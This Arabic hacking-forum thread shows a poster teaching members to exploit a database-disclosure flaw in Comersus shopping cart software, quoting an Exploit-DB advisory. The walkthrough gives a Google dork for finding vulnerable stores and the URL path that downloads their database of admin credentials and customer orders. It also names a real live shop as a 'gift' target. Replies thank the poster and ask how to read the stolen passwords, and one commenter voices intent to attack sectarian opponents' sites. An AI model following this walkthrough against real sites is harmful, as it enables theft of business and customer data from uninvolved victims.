:: vBspiders Professional Network :: - مع Dr.NaNo [ تعال حمل الملف تبع الموقع .. وإخترق ..... لوووووووول ]...

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- Hackers Showoff (http://www.vbspiders.com/vb/f91.html)

مع Dr.NaNo [ تعال حمل الملف تبع الموقع .. وإخترق ..... لوووووووول ]...

السلام عليكم ورحمه الله وبركاته ...

كيفكم ياحلوين اكيد بخير ، << دوم يارب ..

قبل لا ادخل في الموضوع ياريت [ الادارة تفتح قســم خاص بشروحات الثغرات عشان اشرح لكم ] ...

المهم ندخل في صلب الموضوع . ما ابي اطول عليـــكم ..

بسم الله الرحمن الرحيــم ..

اولا هذا موقع الثغره .. للي مايعرف الموقع تبع الثغرات .. :d

www.exploit-db.com

طبعــا موقع >>:

www.MilW0rM.com

^_^ مغلق له 8 شهــور تقريبــأ ....

خلوكم على هذا افضل ..>>:

www.exploit-db.com

نكمل الشرح ..

هذي الثغره الي تخليك تحمل الملف تبع الموقع وفيه معلومات الادمن خخخخخ

http://www.exploit-db.com/exploits/11931

وبشرحهــا لكم ..

الثغره .:

اقتباس:

# Title: Asp - comersus7F Shopping Cart Software Backup Dump Vulnerability
# EDB-ID: 11931
# CVE-ID: ()
# OSVDB-ID: ()
# Author: indoushka
# Published: 2010-03-29
# Verified: yes
# Download Exploit Code
# Download Vulnerable app

view source
print ?

================================================== ======================================
| # Title : Asp - comersus7F Shopping Cart Software Backup Dump Vulnerability
| # Author : indoushka
| # Home : www.iqs3cur1ty.com
| # Bug : Database Disclosure
====================== Exploit By indoushka =================================
# Exploit :

1- http://127.0.0.1/Comersus/database/comersus.mdb

# Brief Description:

By default, comersus.mdb isn't password-protected, and contains the following sensitive information:
- order information (buyer's address, phone, order status, tracking #, obs, etc)
- settings (encryption password, admin email, company information, etc)
- shipments
- etc

Enough to cause damage for the business if any of that information is obtained.

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
--------------------------------------------------------------------------------------------------------------

اولا .: الدورك ..:

inurl:Asp - comersus7F

واتحداك تحصل الدورك في الثغرة خخخخخخخخخخخخخخخخ

طيب نجي للإستغلال .. مكتوب في الثغره .:

http://127.0.0.1/Comersus/database/comersus.mdb

هذا الاستغلال .. خـطا .. انا اشوف ، انه خـطا ..

وهذا الصحيح ..

http://www.Dr.NaNo.com/comersus7F/database/comersus.mdb

ركزو معي ..:

اكتبو بعد رابط الموقع هذا المسار بس ..:

comersus7F/database/comersus.mdb

وراح يجيك ملف حمله وبتحصل فيه اليوزر والباسورد ههههههههه لوووول

وهذا موقع هدية مني لكم ... :D

كود PHP:

   http://www.totalhealthantiageingclinic.com.au/comersus7F/database/comersus.mdb

################################

الي مافهم ...: < راح افهمــه

رح خذ [ الدورك ] الي فوق ..

وبتطلع لك مواقع بالهبل .. مثل شعر قروشــة .. هههههههههههههههههه

بعدين اختر اي موقع ..:

وامسح الكلام كله. وخل الرابــط كذا

www.xxxx.com

بس واكتب وراه على طول هذا المسار ..:

comersus7F/database/comersus.mdb

وخلاص انتهى ياشنب ...بجيك تحميل حمل وافتحه وبتحصل الباسورد واليورز .. وبس ..:

:D

أنتهى الشششششششششششششششششرح :00001793[1]:

لووووووووووووووول :icon555:

الشــــرح اهـــــداء الى ..:

فريق كلاشنكوف .

والهيكل الارزق .

ودوم البطل .

وسنايبر غزة .

وقروشـة .

ومين كمان ؟ نسيت الباقين والله ..

وإهداء لكل العنــــــــاكـــــب ... < عشان ماحد يزعل ..

تحياتي لكم اخواكم ./

Dr.NaNo

نسيت اقولكم ياشباب ..

المسار ،،، دورره والله نسيت اجيب المسار حق لوحة التحكم خخخخخخخخخخخخخخ

تحياتي لكم

مــــــــــــــــــــــــــــــــــــشكور يالغالي

ألـــــــــــــــــف شكر لك يامبدع
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

grazie يا مبدع لوول

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

مشكورين ياابطال على المرور الجميل

تحياتي لكم

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

Dr.NaNo

مشكــور يـابطـل

موفق بإذن الله ... لك مني أجمل تحية

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

مشكوريين اخواني على المرور الجميل . والرائــع ..

تحياتي لكم ..

مشكوررررر أخي الكريم جزاك الله خيرا
تحياتي

اهلا اخي الكريــم ..

مشكور على المرور الرــائــــع ....

تحياتي لك ..

mshkor tslm y3teek al3fya... bs 3ndy sowal... b3d althmeel mab3'dr a3rf al password ...?? ana ft7ta almlf 3n 6reeq al notepad ?? wesh aswy ?

اقتباس:

المشاركة الأصلية كتبت بواسطة lil_kai (المشاركة 119055)

mshkor tslm y3teek al3fya... bs 3ndy sowal... b3d althmeel mab3'dr a3rf al password ...?? ana ft7ta almlf 3n 6reeq al notepad ?? wesh aswy ?

والله ياغالي مابعرف انقلش .. بس لحضه اشوف فلكانو او سنيبر يمكن يعرفون ..

تحياتي لك

انا قصدي بعد التحميل كيف اعرف الباسورد ?? انا فتحت الفايل عن طريق النوت باد ??? لو تعرف كيف اتحصل علي الباسورد ارجوا الافاده.............................مشكور

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .
موفق بإذن الله ... لك مني أجمل تحية .

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

ابداع يا معلم

شكرا ع الدرس الحلو

ويسلمو ع الاهداء

تسلم يادكتور نانو
بس الثغرة تجي مع اى منتدي الاني والله ادخل مواقع الشيعه واحس اني خلاص بنفجر تجيني حالة نفسيا

مشكورررررررر يا بطل بس عندي طلب في برنامج تستطيع فتح الملف لاني قد جربت الورد اوفيس وجربت ايضا المفكره ولم اجد شي غير خلابيص لم افهم منها شي ارجو التوضيح بهذه المسأله وشكرا